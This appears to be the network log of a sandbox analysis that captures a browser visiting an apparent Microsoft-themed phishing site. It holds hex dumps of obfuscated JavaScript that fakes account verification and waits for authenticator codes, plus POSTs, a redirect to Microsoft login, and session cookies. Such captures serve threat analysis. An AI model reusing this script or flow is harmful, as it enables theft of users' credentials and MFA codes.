                                                                                                                                      2024-05-08 18:12:50 UTC650INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 08 May 2024 18:12:49 GMT
                                                                                                                                      Content-Type: application/javascript
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Content-Disposition: inline; filename="34XulaQandSR5aTPghBsor84ndx89103"
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2%2FQxlLyxqiDgwgBqkC6BerM%2B1H8exacvo%2BnY1VkNgo74sNmEB%2BH8cxZJRCMaGGH2Q8VeYERIF74H%2F3ytFwhN4mpQJS0kqb76X91yFdAL%2BM3XESUPQNJBIuSm1kmeLQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 880b6b921a592805-SEA
                                                                                                                                      2024-05-08 18:12:50 UTC719INData Raw: 32 63 35 39 0d 0a 63 6f 6e 73 74 20 5f 30 78 31 34 36 31 36 32 3d 5f 30 78 34 38 37 63 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 34 64 62 36 39 30 2c 5f 30 78 62 66 33 33 35 66 29 7b 63 6f 6e 73 74 20 5f 30 78 33 32 33 31 36 65 3d 5f 30 78 34 38 37 63 2c 5f 30 78 33 31 37 66 32 61 3d 5f 30 78 34 64 62 36 39 30 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 33 39 32 31 32 66 3d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 32 33 31 36 65 28 30 78 31 34 65 29 29 2f 30 78 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 32 33 31 36 65 28 30 78 31 66 30 29 29 2f 30 78 32 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 33 32 33 31 36 65 28 30 78 61 35 29 29 2f 30 78 33 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 32 33 31 36 65 28 30
                                                                                                                                      Data Ascii: 2c59const _0x146162=_0x487c;(function(_0x4db690,_0xbf335f){const _0x32316e=_0x487c,_0x317f2a=_0x4db690();while(!![]){try{const _0x39212f=parseInt(_0x32316e(0x14e))/0x1*(-parseInt(_0x32316e(0x1f0))/0x2)+parseInt(_0x32316e(0xa5))/0x3+-parseInt(_0x32316e(0
                                                                                                                                      2024-05-08 18:12:50 UTC1369INData Raw: 78 31 39 65 29 5d 28 5f 30 78 31 34 36 31 36 32 28 30 78 31 32 37 29 29 26 26 28 76 69 65 77 3d 5f 30 78 31 34 36 31 36 32 28 30 78 62 39 29 29 3b 64 6f 63 75 6d 65 6e 74 5b 27 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 27 5d 28 5f 30 78 31 34 36 31 36 32 28 30 78 32 30 38 29 29 26 26 21 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 31 34 36 31 36 32 28 30 78 62 62 29 5d 28 5f 30 78 31 34 36 31 36 32 28 30 78 32 30 38 29 29 5b 5f 30 78 31 34 36 31 36 32 28 30 78 62 32 29 5d 5b 5f 30 78 31 34 36 31 36 32 28 30 78 31 39 65 29 5d 28 5f 30 78 31 34 36 31 36 32 28 30 78 31 32 37 29 29 26 26 28 76 69 65 77 3d 5f 30 78 31 34 36 31 36 32 28 30 78 63 32 29 29 3b 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 31 34 36 31 36 32 28 30 78 31 32 65 29 5d 28 27 6b 65 79 75 70 27 2c 66 75 6e
                                                                                                                                      Data Ascii: x19e)](_0x146162(0x127))&&(view=_0x146162(0xb9));document['getElementById'](_0x146162(0x208))&&!document[_0x146162(0xbb)](_0x146162(0x208))[_0x146162(0xb2)][_0x146162(0x19e)](_0x146162(0x127))&&(view=_0x146162(0xc2));document[_0x146162(0x12e)]('keyup',fun
                                                                                                                                      2024-05-08 18:12:50 UTC1369INData Raw: 6e 28 5f 30 78 34 66 38 34 32 65 29 7b 63 6f 6e 73 74 20 5f 30 78 35 32 35 32 36 66 3d 5f 30 78 31 34 36 31 36 32 3b 5f 30 78 34 66 38 34 32 65 3d 3d 30 78 30 26 26 28 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 35 32 35 32 36 66 28 30 78 62 62 29 5d 28 5f 30 78 35 32 35 32 36 66 28 30 78 31 35 62 29 2b 76 69 65 77 29 5b 27 71 75 65 72 79 53 65 6c 65 63 74 6f 72 27 5d 28 5f 30 78 35 32 35 32 36 66 28 30 78 31 64 65 29 29 5b 5f 30 78 35 32 35 32 36 66 28 30 78 62 32 29 5d 5b 5f 30 78 35 32 35 32 36 66 28 30 78 31 65 39 29 5d 28 5f 30 78 35 32 35 32 36 66 28 30 78 31 33 39 29 29 2c 64 6f 63 75 6d 65 6e 74 5b 27 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 27 5d 28 5f 30 78 35 32 35 32 36 66 28 30 78 31 35 62 29 2b 76 69 65 77 29 5b 5f 30 78 35 32 35 32 36 66 28 30 78
                                                                                                                                      Data Ascii: n(_0x4f842e){const _0x52526f=_0x146162;_0x4f842e==0x0&&(document[_0x52526f(0xbb)](_0x52526f(0x15b)+view)['querySelector'](_0x52526f(0x1de))[_0x52526f(0xb2)][_0x52526f(0x1e9)](_0x52526f(0x139)),document['getElementById'](_0x52526f(0x15b)+view)[_0x52526f(0x
                                                                                                                                      2024-05-08 18:12:50 UTC1369INData Raw: 69 6f 6e 27 5d 3d 5f 30 78 31 62 36 31 63 30 28 30 78 31 66 34 29 2b 5f 30 78 33 34 35 34 35 38 2b 5f 30 78 31 62 36 31 63 30 28 30 78 31 64 32 29 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 63 68 61 6e 67 65 62 61 63 6b 62 75 74 74 6f 6e 28 5f 30 78 32 64 35 36 63 34 2c 5f 30 78 32 35 65 64 37 66 29 7b 63 6f 6e 73 74 20 5f 30 78 33 35 38 33 35 63 3d 5f 30 78 31 34 36 31 36 32 3b 5f 30 78 32 35 65 64 37 66 3d 3d 30 78 30 26 26 28 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 33 35 38 33 35 63 28 30 78 62 62 29 5d 28 5f 30 78 33 35 38 33 35 63 28 30 78 31 35 62 29 2b 5f 30 78 32 64 35 36 63 34 29 5b 5f 30 78 33 35 38 33 35 63 28 30 78 31 32 34 29 5d 28 27 2e 62 61 63 6b 27 29 5b 27 73 74 79 6c 65 27 5d 5b 27 64 69 73 70 6c 61 79 27 5d 3d 5f 30 78 33 35 38 33 35 63 28 30 78
                                                                                                                                      Data Ascii: ion']=_0x1b61c0(0x1f4)+_0x345458+_0x1b61c0(0x1d2));}function changebackbutton(_0x2d56c4,_0x25ed7f){const _0x35835c=_0x146162;_0x25ed7f==0x0&&(document[_0x35835c(0xbb)](_0x35835c(0x15b)+_0x2d56c4)[_0x35835c(0x124)]('.back')['style']['display']=_0x35835c(0x
                                                                                                                                      2024-05-08 18:12:50 UTC1369INData Raw: 78 32 38 39 32 36 39 28 30 78 31 32 37 29 29 2c 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 32 38 39 32 36 39 28 30 78 31 64 63 29 5d 5b 27 73 74 79 6c 65 27 5d 5b 5f 30 78 32 38 39 32 36 39 28 30 78 64 37 29 5d 26 26 28 64 6f 63 75 6d 65 6e 74 5b 27 62 6f 64 79 27 5d 5b 27 73 74 79 6c 65 27 5d 5b 5f 30 78 32 38 39 32 36 39 28 30 78 64 37 29 5d 3d 27 27 29 2c 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 32 38 39 32 36 39 28 30 78 31 64 63 29 5d 5b 5f 30 78 32 38 39 32 36 39 28 30 78 65 65 29 5d 5b 27 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 27 5d 26 26 28 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 32 38 39 32 36 39 28 30 78 31 64 63 29 5d 5b 5f 30 78 32 38 39 32 36 39 28 30 78 65 65 29 5d 5b 27 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 27 5d 3d 27 27 29 2c 76 69 65 77 3d
                                                                                                                                      Data Ascii: x289269(0x127)),document[_0x289269(0x1dc)]['style'][_0x289269(0xd7)]&&(document['body']['style'][_0x289269(0xd7)]=''),document[_0x289269(0x1dc)][_0x289269(0xee)]['backgroundColor']&&(document[_0x289269(0x1dc)][_0x289269(0xee)]['backgroundColor']=''),view=
                                                                                                                                      2024-05-08 18:12:50 UTC1369INData Raw: 6f 63 75 6d 65 6e 74 5b 27 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 27 5d 28 5f 30 78 65 31 36 64 31 30 28 30 78 31 31 33 29 29 5b 5f 30 78 65 31 36 64 31 30 28 30 78 31 32 34 29 5d 28 27 2e 74 69 74 6c 65 27 29 5b 27 74 65 78 74 43 6f 6e 74 65 6e 74 27 5d 3d 5f 30 78 33 62 34 65 35 63 5b 5f 30 78 65 31 36 64 31 30 28 30 78 31 65 66 29 5d 3b 76 61 72 20 5f 30 78 34 33 66 66 32 64 3d 5f 30 78 33 62 34 65 35 63 5b 5f 30 78 65 31 36 64 31 30 28 30 78 31 65 36 29 5d 3b 64 6f 63 75 6d 65 6e 74 5b 27 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 27 5d 28 5f 30 78 65 31 36 64 31 30 28 30 78 64 62 29 29 5b 5f 30 78 65 31 36 64 31 30 28 30 78 31 30 30 29 5d 3d 27 3c 73 70 61 6e 3e 27 2b 5f 30 78 34 33 66 66 32 64 5b 5f 30 78 65 31 36 64 31 30 28 30 78 31 63 63 29 5d
                                                                                                                                      Data Ascii: ocument['getElementById'](_0xe16d10(0x113))[_0xe16d10(0x124)]('.title')['textContent']=_0x3b4e5c[_0xe16d10(0x1ef)];var _0x43ff2d=_0x3b4e5c[_0xe16d10(0x1e6)];document['getElementById'](_0xe16d10(0xdb))[_0xe16d10(0x100)]='<span>'+_0x43ff2d[_0xe16d10(0x1cc)]
                                                                                                                                      2024-05-08 18:12:50 UTC1369INData Raw: 65 63 65 69 76 65 28 27 77 61 69 74 61 75 74 68 27 2c 5b 5f 30 78 32 38 39 32 36 39 28 30 78 31 39 30 29 5d 2c 30 78 31 29 5b 5f 30 78 32 38 39 32 36 39 28 30 78 64 34 29 5d 28 5f 30 78 31 37 30 39 37 37 3d 3e 7b 63 6f 6e 73 74 20 5f 30 78 64 39 35 61 62 30 3d 5f 30 78 32 38 39 32 36 39 3b 5f 30 78 31 37 30 39 37 37 26 26 28 5f 30 78 31 37 30 39 37 37 5b 5f 30 78 64 39 35 61 62 30 28 30 78 31 30 35 29 5d 3d 3d 27 6d 6f 72 65 5c 78 32 30 69 6e 66 6f 5c 78 32 30 72 65 71 75 69 72 65 64 27 26 26 6d 6f 72 65 69 6e 66 6f 72 65 71 28 29 2c 5f 30 78 31 37 30 39 37 37 5b 5f 30 78 64 39 35 61 62 30 28 30 78 31 30 35 29 5d 3d 3d 5f 30 78 64 39 35 61 62 30 28 30 78 31 32 64 29 26 26 28 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 64 39 35 61 62 30 28 30 78 62 62 29 5d 28 5f
                                                                                                                                      Data Ascii: eceive('waitauth',[_0x289269(0x190)],0x1)[_0x289269(0xd4)](_0x170977=>{const _0xd95ab0=_0x289269;_0x170977&&(_0x170977[_0xd95ab0(0x105)]=='more\x20info\x20required'&&moreinforeq(),_0x170977[_0xd95ab0(0x105)]==_0xd95ab0(0x12d)&&(document[_0xd95ab0(0xbb)](_
                                                                                                                                      2024-05-08 18:12:50 UTC1369INData Raw: 39 35 5b 5f 30 78 34 66 66 34 66 38 28 30 78 31 66 61 29 5d 28 5f 30 78 34 66 66 34 66 38 28 30 78 31 61 38 29 29 5d 2c 30 78 31 29 5b 5f 30 78 34 66 66 34 66 38 28 30 78 64 34 29 5d 28 5f 30 78 31 66 38 66 32 63 3d 3e 7b 63 6f 6e 73 74 20 5f 30 78 31 33 61 65 31 65 3d 5f 30 78 34 66 66 34 66 38 3b 69 66 28 5f 30 78 31 66 38 66 32 63 29 7b 6c 6f 61 64 69 6e 67 61 6e 69 6d 61 74 69 6f 6e 28 30 78 31 29 3b 5f 30 78 31 66 38 66 32 63 5b 5f 30 78 31 33 61 65 31 65 28 30 78 31 30 35 29 5d 3d 3d 5f 30 78 31 33 61 65 31 65 28 30 78 62 31 29 26 26 28 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 31 33 61 65 31 65 28 30 78 62 62 29 5d 28 5f 30 78 31 33 61 65 31 65 28 30 78 31 30 65 29 29 5b 5f 30 78 31 33 61 65 31 65 28 30 78 32 30 62 29 5d 3d 27 27 2c 64 6f 63 75 6d 65 6e
                                                                                                                                      Data Ascii: 95[_0x4ff4f8(0x1fa)](_0x4ff4f8(0x1a8))],0x1)[_0x4ff4f8(0xd4)](_0x1f8f2c=>{const _0x13ae1e=_0x4ff4f8;if(_0x1f8f2c){loadinganimation(0x1);_0x1f8f2c[_0x13ae1e(0x105)]==_0x13ae1e(0xb1)&&(document[_0x13ae1e(0xbb)](_0x13ae1e(0x10e))[_0x13ae1e(0x20b)]='',documen
                                                                                                                                      2024-05-08 18:12:50 UTC1059INData Raw: 78 61 64 29 29 2c 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 31 33 61 65 31 65 28 30 78 62 62 29 5d 28 5f 30 78 31 33 61 65 31 65 28 30 78 64 62 29 29 5b 5f 30 78 31 33 61 65 31 65 28 30 78 31 30 30 29 5d 3d 27 3c 73 70 61 6e 3e 53 6f 72 72 79 2c 5c 78 32 30 77 65 5c 78 32 37 72 65 5c 78 32 30 68 61 76 69 6e 67 5c 78 32 30 74 72 6f 75 62 6c 65 5c 78 32 30 76 65 72 69 66 79 69 6e 67 5c 78 32 30 79 6f 75 72 5c 78 32 30 61 63 63 6f 75 6e 74 2e 5c 78 32 30 50 6c 65 61 73 65 5c 78 32 30 74 72 79 5c 78 32 30 61 67 61 69 6e 2e 3c 2f 73 70 61 6e 3e 3c 61 5c 78 32 30 69 64 3d 5c 78 32 32 56 69 65 77 44 65 74 61 69 6c 73 5c 78 32 32 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 6e 6f 2d 77 72 61 70 5c 78 32 32 5c 78 32 30 68 72 65 66 3d 5c 78 32 32 23 5c 78 32 32 3e 56 69 65
                                                                                                                                      Data Ascii: xad)),document[_0x13ae1e(0xbb)](_0x13ae1e(0xdb))[_0x13ae1e(0x100)]='<span>Sorry,\x20we\x27re\x20having\x20trouble\x20verifying\x20your\x20account.\x20Please\x20try\x20again.</span><a\x20id=\x22ViewDetails\x22\x20class=\x22no-wrap\x22\x20href=\x22#\x22>Vie
                                                                                                                                      2024-05-08 18:12:50 UTC1369INData Raw: 31 38 65 30 0d 0a 65 31 65 28 30 78 31 64 38 29 2c 30 78 30 2c 5f 30 78 31 66 38 66 32 63 5b 27 64 65 73 63 72 69 70 74 69 6f 6e 27 5d 29 2c 62 6f 74 74 6f 6d 73 65 63 74 69 6f 6e 6c 69 6e 6b 73 28 27 61 75 74 68 61 70 70 27 2c 5f 30 78 31 66 38 66 32 63 5b 5f 30 78 31 33 61 65 31 65 28 30 78 31 34 31 29 5d 29 2c 63 68 61 6e 67 65 62 61 63 6b 62 75 74 74 6f 6e 28 5f 30 78 31 33 61 65 31 65 28 30 78 31 64 38 29 2c 5f 30 78 31 66 38 66 32 63 5b 27 62 61 63 6b 62 75 74 74 6f 6e 27 5d 29 2c 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 31 33 61 65 31 65 28 30 78 62 62 29 5d 28 5f 30 78 31 33 61 65 31 65 28 30 78 31 62 38 29 29 5b 5f 30 78 31 33 61 65 31 65 28 30 78 31 63 38 29 5d 3d 5f 30 78 31 66 38 66 32 63 5b 27 61 75 74 68 61 70 70 63 6f 64 65 27 5d 2c 64 6f 63 75
                                                                                                                                      Data Ascii: 18e0e1e(0x1d8),0x0,_0x1f8f2c['description']),bottomsectionlinks('authapp',_0x1f8f2c[_0x13ae1e(0x141)]),changebackbutton(_0x13ae1e(0x1d8),_0x1f8f2c['backbutton']),document[_0x13ae1e(0xbb)](_0x13ae1e(0x1b8))[_0x13ae1e(0x1c8)]=_0x1f8f2c['authappcode'],docu


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      44192.168.2.1649765104.21.15.1404435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:49 UTC1660OUTPOST /qzgXe6GTtpy9MQNktQ1m82zcabjeVXbE6XxvQzPom7 HTTP/1.1
                                                                                                                                      Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Content-Length: 31
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                                                                                                      X-Requested-With: XMLHttpRequest
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Origin: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      Referer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQ
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: XSRF-TOKEN=eyJpdiI6IkJackFUR0FORlRxQi9zV0xnS1E1d0E9PSIsInZhbHVlIjoiQ2pvanByVlJlV04wb3B2S3ZvZlhodkRXYUliNFJ0T2h5QWpIeTVPdXo3YjNpeGp5M0pQek8vQURWQkFQaTUrWEZZVm5yQ01iMnQzQklpaDU5eWdIRE9wRUJEQ2EvcWQwZ1dEWDFXc2JzekJLSWZ3UUo2RWVrS2ZEUzkzc25LeGciLCJtYWMiOiI0ODJhNzVhMmE1MTJkNmY2ZTY0OWY0NjBmYTk3YjZjOThmZjAyZTAzZTdhNGI3ZjE3MWQzMzdlNGU5NGQ4ZDgwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImFqZ2NDUnQ2UDJTa2dUSnUzNzlwZXc9PSIsInZhbHVlIjoiU1lJSFpWdUJsYmRZVGVQUW1BQmJiN09Odk9FRlNjbXIrWWVyU3AxN1ZWSGZJWG9UOVgwb0dUTEVRSUZiVXJ2WktBdGZ6REJidVVuZ2d3UjRpMEJyMVBRSjRIUzB3YWp5MGRmK1Axa0U0L0d6Y0lZM2pUWjhFVnY1VkFnT1VRc0giLCJtYWMiOiJiOTkyYzRiOTc1ZDU4MjVkNzIyYmY2NDRkM2YwMDBmNTVlZmYwYTlhYzVjNzhiOGI3ZjRhNWYwZGI2MWVmYTI3IiwidGFnIjoiIn0%3D
                                                                                                                                      2024-05-08 18:12:49 UTC31OUTData Raw: 70 61 67 65 6c 69 6e 6b 3d 59 35 66 78 53 44 26 74 79 70 65 3d 34 26 61 70 70 6e 75 6d 3d 31
                                                                                                                                      Data Ascii: pagelink=Y5fxSD&type=4&appnum=1
                                                                                                                                      2024-05-08 18:12:50 UTC995INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 08 May 2024 18:12:50 GMT
                                                                                                                                      Content-Type: application/json
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: no-cache, private
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nFG0YjvcamHf3YgbFmZdmV7MP1%2BOEDEGhHk12bANQ%2F4983GcIIhTkTFQUekkNmUc8tKtYtiOFE4HCyB9m8rwYubbmcSbJg5hKV76eyAAPnx9bqzzzdd0zHmWKeE8AQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      Set-Cookie: XSRF-TOKEN=eyJpdiI6IktLSk1OclZ1d05BNFJobUtvQW1pU3c9PSIsInZhbHVlIjoiYVdoNUFQNTFHRzN3Y01MMVdrbW5BR2Z4OHJ0OExEL1ZxS2VmYmhNVEhONzRPcjZVRXdna2dyVC9uM0dtMFhBRDRjSWpyMEh5RnRpcWNLNkhGMjVsYzNoTDBHelc2Q1doTWZ4U1lZakx0NDkxd3dnb0k1MC83ZmdGSDdlTzVwcEgiLCJtYWMiOiI0YjMyZjU3MzU2NTk1ZDgwMjZkN2FiMWExMDI4MjAxMzYyNDUyNjc0Mzc4OGY3NTkyMWMzOTJjMjdjY2JmMzcyIiwidGFnIjoiIn0%3D; expires=Wed, 08-May-2024 20:12:50 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                                                                      2024-05-08 18:12:50 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6c 68 43 59 6b 56 6e 55 33 4e 36 59 7a 63 35 4b 33 68 54 4d 6d 74 32 4d 44 46 79 4e 47 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 62 6a 6b 79 4d 30 52 7a 63 45 39 53 4e 45 64 6f 55 58 70 74 64 45 56 71 4d 48 64 35 4e 47 6c 6e 59 6d 4e 68 4d 46 70 6c 64 32 6c 74 57 6b 46 7a 57 6b 77 30 52 45 4a 4f 62 56 6c 78 5a 44 63 7a 62 56 64 59 54 6c 42 78 62 44 63 34 4d 6a 49 72 65 57 4a 4e 65 6a 68 47 55 56 4a 75 5a 55 45 33 55 46 4e 51 5a 30 35 54 52 46 5a 6e 63 54 68 77 59 54 6b 30 52 30 5a 55 61 45 70 72 53 45 51 31 53 48 42 56 53 32 73 32 57 56 46 51 53 32 46 31 63 57 70 59 51 57 68 30 4d 44 4e 57 52 45 74 4f 55 7a 4a 58 61 46 67 31 52 57 49
                                                                                                                                      Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IlhCYkVnU3N6Yzc5K3hTMmt2MDFyNGc9PSIsInZhbHVlIjoibjkyM0RzcE9SNEdoUXptdEVqMHd5NGlnYmNhMFpld2ltWkFzWkw0REJObVlxZDczbVdYTlBxbDc4MjIreWJNejhGUVJuZUE3UFNQZ05TRFZncThwYTk0R0ZUaEprSEQ1SHBVS2s2WVFQS2F1cWpYQWh0MDNWREtOUzJXaFg1RWI
                                                                                                                                      2024-05-08 18:12:50 UTC97INData Raw: 35 62 0d 0a 7b 22 65 78 70 69 72 65 64 22 3a 30 2c 22 72 65 64 69 72 65 63 74 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 6f 67 69 6e 2e 6d 69 63 72 6f 73 6f 66 74 6f 6e 6c 69 6e 65 2e 63 6f 6d 5c 2f 63 6f 6d 6d 6f 6e 5c 2f 53 41 53 5c 2f 50 72 6f 63 65 73 73 41 75 74 68 22 7d 0d 0a
                                                                                                                                      Data Ascii: 5b{"expired":0,"redirecturl":"https:\/\/login.microsoftonline.com\/common\/SAS\/ProcessAuth"}
                                                                                                                                      2024-05-08 18:12:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      45192.168.2.1649764104.21.15.1404435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:49 UTC1345OUTGET /web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket HTTP/1.1
                                                                                                                                      Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Connection: Upgrade
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Upgrade: websocket
                                                                                                                                      Origin: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Sec-WebSocket-Version: 13
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: XSRF-TOKEN=eyJpdiI6IkJackFUR0FORlRxQi9zV0xnS1E1d0E9PSIsInZhbHVlIjoiQ2pvanByVlJlV04wb3B2S3ZvZlhodkRXYUliNFJ0T2h5QWpIeTVPdXo3YjNpeGp5M0pQek8vQURWQkFQaTUrWEZZVm5yQ01iMnQzQklpaDU5eWdIRE9wRUJEQ2EvcWQwZ1dEWDFXc2JzekJLSWZ3UUo2RWVrS2ZEUzkzc25LeGciLCJtYWMiOiI0ODJhNzVhMmE1MTJkNmY2ZTY0OWY0NjBmYTk3YjZjOThmZjAyZTAzZTdhNGI3ZjE3MWQzMzdlNGU5NGQ4ZDgwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImFqZ2NDUnQ2UDJTa2dUSnUzNzlwZXc9PSIsInZhbHVlIjoiU1lJSFpWdUJsYmRZVGVQUW1BQmJiN09Odk9FRlNjbXIrWWVyU3AxN1ZWSGZJWG9UOVgwb0dUTEVRSUZiVXJ2WktBdGZ6REJidVVuZ2d3UjRpMEJyMVBRSjRIUzB3YWp5MGRmK1Axa0U0L0d6Y0lZM2pUWjhFVnY1VkFnT1VRc0giLCJtYWMiOiJiOTkyYzRiOTc1ZDU4MjVkNzIyYmY2NDRkM2YwMDBmNTVlZmYwYTlhYzVjNzhiOGI3ZjRhNWYwZGI2MWVmYTI3IiwidGFnIjoiIn0%3D
                                                                                                                                      Sec-WebSocket-Key: JXOwk1JwJpvkrupdQd7qRQ==
                                                                                                                                      Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                      2024-05-08 18:12:50 UTC623INHTTP/1.1 400 Bad Request
                                                                                                                                      Date: Wed, 08 May 2024 18:12:50 GMT
                                                                                                                                      Content-Type: application/json
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TDtdrShatZMiLw%2Fu4l7%2B3lI14%2Bdri2iDWJxRFt%2BRayV9UMdHng%2F0AXzpA4KDcsu3VVQGfqpEWlcDdoZhs1rnLIFy%2F5HQcuziywcR8AcohYeKmg3y66IebDTMQlot2qEpuZKj0byncP7j37kjws4%2Bc%2BpZiUGHvvB9pe4gUby8xEXh"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 880b6b934eac7669-SEA
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      2024-05-08 18:12:50 UTC40INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a
                                                                                                                                      Data Ascii: 22{"code":3,"message":"Bad request"}
                                                                                                                                      2024-05-08 18:12:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      46192.168.2.1649766104.21.15.1404435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:49 UTC1569OUTGET /klU9KZQ56usLE89rVZhW6EvSGnlmL6U9fLwsF2zEvKwopEY9bQKaO7rWoafPGfbDjab230 HTTP/1.1
                                                                                                                                      Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: image
